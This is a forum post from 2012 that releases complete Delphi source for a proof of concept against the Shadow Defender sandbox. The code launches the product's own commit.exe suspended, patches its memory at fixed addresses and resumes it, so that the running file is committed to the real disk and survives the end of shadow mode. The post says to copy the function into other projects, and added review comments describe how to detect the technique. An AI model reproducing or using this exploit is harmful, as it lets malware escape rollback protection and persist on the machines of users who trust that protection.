 #16834  by Houdini
 Sun Nov 25, 2012 7:08 pm
Hello,

Try running the attached sample in shadow mode under Shadow Defender (final version, 32-bit):
www.shadowdefender.com
When shadow mode is exited, our attached sample is not deleted by Shadow Defender;
it is automatically committed to the original drive.

This is the source:
program commitme;


uses
  windows;


{ Reads Shadow Defender's install path from HKLM, launches the product's
  own commit.exe suspended with "param" on its command line, writes four
  byte patches to fixed addresses inside the suspended child and then
  resumes it. Returns true only when every step succeeded; on any failure
  it exits early with false.

  NOTE(review): the patch addresses and bytes are tied to one specific
  commit.exe build (presumably the one the post was tested against); on a
  different build the writes presumably land on unrelated code, so the
  result is undefined.
  From a defensive viewpoint the observable sequence is
  CreateProcess(CREATE_SUSPENDED) -> WriteProcessMemory into the child ->
  ResumeThread, preceded by a read of the product's registry key with
  KEY_ALL_ACCESS; both are worth alerting on against a sandbox/rollback
  product's own binaries.
  Also: the registry key handle and the process/thread handles from pi are
  never closed, and "exit;;" contains an empty statement (harmless). }
function __commiteme (param : string):bool;
var
hshadow : hkey;
vshadow : array [0..255] of char;  { buffer for the 'path' registry value }
rshadow : string;                   { full path to <install path>\commit.exe }
written : dword;
readden : integer;                  { passed as the size in/out parameter of regqueryvalueex }
pi : tprocessInformation;
si : tstartupInfo;

const
{ Four (address, bytes) pairs written into the suspended child below.
  NOTE(review): build-specific; not decoded here. }
one_data : array [0..6] of byte = ($90,$90,$90,$90,$90,$39,$DB);
one_addr : cardinal = $00403976;

tow_data : array [0..33] of byte = ($56,$FF,$15,$E8,$F2,$43,$00,$68,$E8,$03,$00,$00,$56,$FF,$15,$20,$F2,$43,$00,$A9,$02,$01,$00,$00,$75,$ED,$6A,$00,$FF,$15,$F8,$F0,$43,$00);
tow_addr : cardinal = $00403A4E;

mov_data : byte = $89;
mov_addr : cardinal = $0040328E;

ini_data : array [0..02] of byte = ($89,$DE,$75);
ini_addr : cardinal = $0040363E;

begin
result := false;
fillchar(si, sizeof(tstartupinfo), #0);
fillchar(pi, sizeof(tprocessinformation), #0);
{ KEY_ALL_ACCESS on an HKLM key likely needs administrative rights; a
  read-only access mask would suffice for the single query that follows. }
if regopenkeyex(hkey_local_machine,'software\shadow Defender',0,KEY_ALL_ACCESS,hshadow) <> 0 then exit;
readden := sizeof (vshadow);
{ NOTE(review): assumes the stored value is NUL-terminated within 256
  chars; string(vshadow) relies on that terminator. }
if regqueryvalueex(hshadow,'path',nil,nil,addr(vshadow),addr(readden)) <> 0 then exit;
rshadow := string (vshadow) + '\commit.exe';
{ Command line: "<commit.exe>" <param>| -- the trailing '|' is part of the
  argument format the child apparently expects; not verified here. }
param := '"'+rshadow+'"' + ' ' +param+'|';
{ Child is created suspended so the patches below land before its first
  instruction runs. }
if not createprocess(pansichar (rshadow),pansichar (param), nil, nil, false,create_suspended, nil, nil, si, pi) then exit;;
if not writeprocessmemory (pi.hprocess,ptr (one_addr),addr (one_data),length (one_data),written) then exit;
if not writeprocessmemory (pi.hprocess,ptr (tow_addr),addr (tow_data),length (tow_data),written) then exit;
if not writeprocessmemory (pi.hprocess,ptr (mov_addr),addr (mov_data),1,written) then exit;
if not writeprocessmemory (pi.hprocess,ptr (ini_addr),addr (ini_data),length (ini_data),written) then exit;
{ resumethread returns the previous suspend count, or $ffffffff on error. }
if resumethread (pi.hthread) = $ffffffff then exit;;
result := true;
end;
begin
{
coder : houdini (c) , www.at4re.com (tm)

How to use: function __commiteme (path : string) : bool;
path = full path of the file to commit

Add your code here, or copy the function into your own project and call
__commiteme with the full file path as the parameter to commit that file.
If the function succeeds the return value is true; on any error it returns false.
(The original comment referred to the function as "__commitme"; the
declared name above is "__commiteme".)
}

{ example : }
__commiteme (paramstr(0));
{ paramstr(0) is the full path of the currently running executable;
  the return value is ignored here. }
end.
regards
exec in shadow mode - no deleted -